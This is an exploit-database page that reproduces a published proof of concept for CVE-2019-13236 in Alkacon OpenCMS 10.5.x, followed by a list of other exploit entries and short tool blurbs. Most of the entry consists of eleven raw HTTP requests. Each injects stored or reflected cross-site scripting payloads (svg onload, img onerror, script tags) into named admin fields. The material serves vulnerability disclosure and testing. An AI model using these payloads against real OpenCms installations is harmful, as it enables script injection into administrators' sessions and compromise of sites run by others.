Menu

Search for hundreds of thousands of exploits

"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)"

Author

Aetsu

Platform

multiple

Release date

2019-09-02

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms
Site Management
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/opencms-core
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13236

1. In Site Management > New site (Stored XSS):
- Affected resource title.0:
POC:
```
POST /system/workplace/admin/sites/new.jsp HTTP/1.1
Host: example.com
title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se
```
2. In Treeview (Reflected XSS):
- Affected resource type:
POC:
```
http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=
</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=
```
3. In Workspace tools > Login message (Stored XSS):
- Affected resource message.0:
POC:
```
POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
Host: example.com
enabled.0=true&enabled.0.value=true&message.0=<svg
onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=
```
4. In Index sources > View index sources > New index source (Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=
```
5. In Index sources > View field configuration > New field configuration
(Stored XSS):
- Affected resource name.0:
POC:
```
POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
Host: example.com
name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=
```
6. In Account Management > Impor/Export user data (Reflected XSS):
- Affected resource oufqn:
POC:
```
POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp
HTTP/1.1
Host: example.com
groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=
```
7. In Account Management > Group Management > New Group (Stored XSS):
- Affected resources name.0 and description.0:
POC:```
POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27
```
8. In Account Management > Organizational Unit > Organizational Unit
Management > New sub organizational unit (Stored XSS):
- Affected resources parentOuDesc.0 and resources.0:
POC:```
POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
Host: example.com
name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
```
9. In Link Validator > External Link Validator > Validate External Links
(Reflected XSS):
- Affected resources reporttype, reportcontinuekey and title:
POC:```
POST
/system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks
HTTP/1.1
Host: example.com
dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
```
10. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0,
downloadGallery.0:
POC:```
POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="inputDir.0"
.
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="destinationDir.0"
/whbo0"><script>alert(1)</script>nrbhd
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="imageGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="downloadGallery.0"
------WebKitFormBoundaryLyJOmAtrd8ArxNqf
Content-Disposition: form-data; name="linkGallery.0"
[...]
```
11. In Administrator view > Database management > Extended html import >
Default html values (Reflected XSS):
- Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and
downloadGallery.0:
POC:
```
POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
Host: example.com
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="inputDir.0"
gato
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="destinationDir.0"
testszfgw"><script>alert(1)</script>vqln7
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="imageGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="downloadGallery.0"
test
------WebKitFormBoundary6fy3ENawtXT0qmgB
Content-Disposition: form-data; name="linkGallery.0"
test
[...]
```


Extended POCs: https://aetsu.github.io/OpenCms
Release Date Title Type Platform Author
2019-09-09 "Enigma NMS 65.0.0 - SQL Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - OS Command Injection" webapps multiple mark
2019-09-09 "Enigma NMS 65.0.0 - Cross-Site Request Forgery" webapps multiple mark
2019-09-06 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution" remote multiple "Justin Wagner"
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
2019-08-29 "Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform" dos multiple "Google Security Research"
2019-08-21 "Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities" remote multiple "Pedro Ribeiro"
2019-08-27 "Tableau - XML External Entity" webapps multiple "Jarad Kopf"
2019-08-23 "Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal" webapps multiple MaYaSeVeN
2019-08-21 "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)" webapps multiple "Alyssa Herrera"
2019-08-21 "LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)" remote multiple LoadLow
2019-08-01 "SilverSHielD 6.x - Local Privilege Escalation" local multiple "Ian Bredemeyer"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
Release Date Title Type Platform Author
2019-09-02 "Alkacon OpenCMS 10.5.x - Local File inclusion" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)" webapps multiple Aetsu
2019-09-02 "Alkacon OpenCMS 10.5.x - Cross-Site Scripting" webapps multiple Aetsu
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47339/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/47339/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47339/41701/alkacon-opencms-105x-cross-site-scripting-2/download/", "exploit_id": "47339", "exploit_description": "\"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)\"", "exploit_date": "2019-09-02", "exploit_author": "Aetsu", "exploit_type": "webapps", "exploit_platform": "multiple", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse